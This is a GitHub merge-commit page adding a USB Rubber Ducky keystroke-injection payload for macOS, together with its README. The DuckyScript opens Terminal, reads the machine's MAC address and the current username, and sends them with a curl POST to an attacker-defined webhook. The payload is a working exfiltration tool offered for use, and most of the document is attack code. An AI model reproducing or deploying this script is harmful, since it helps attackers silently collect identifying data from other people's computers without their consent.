Merge pull request #494 from aleff-github/patch-96

Exfiltrate Mac Address - MacOS
pull/496/head
Peaks 2024-10-31 04:43:07 -04:00 committed by GitHub
commit 645f1e9fe3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 80 additions and 0 deletions

View File

@ -0,0 +1,25 @@
# Exfiltrate Mac Address - MacOS
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
### Details
- **Title**: Exfiltrate Mac Address
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Exfiltration
- **Target**: MacOS
### Dependencies
- Set the #WEBHOOK to complete the exfiltration
`DEFINE #WEBHOOK example`
## How It Works 📜
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Acquire the mac address and the system user name
- Send this informations through the Webhook

View File

@ -0,0 +1,55 @@
REM_BLOCK
####################################################
# #
# Title : Exfiltrate Mac Address - MacOS #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : MacOS #
# #
####################################################
END_REM
REM Set the #WEBHOOK to complete the exfiltration
DEFINE #WEBHOOK example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 750
STRINGLN mac=$(networksetup -getmacaddress en0)
DELAY 750
STRINGLN name=$(id -un)
DELAY 850
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK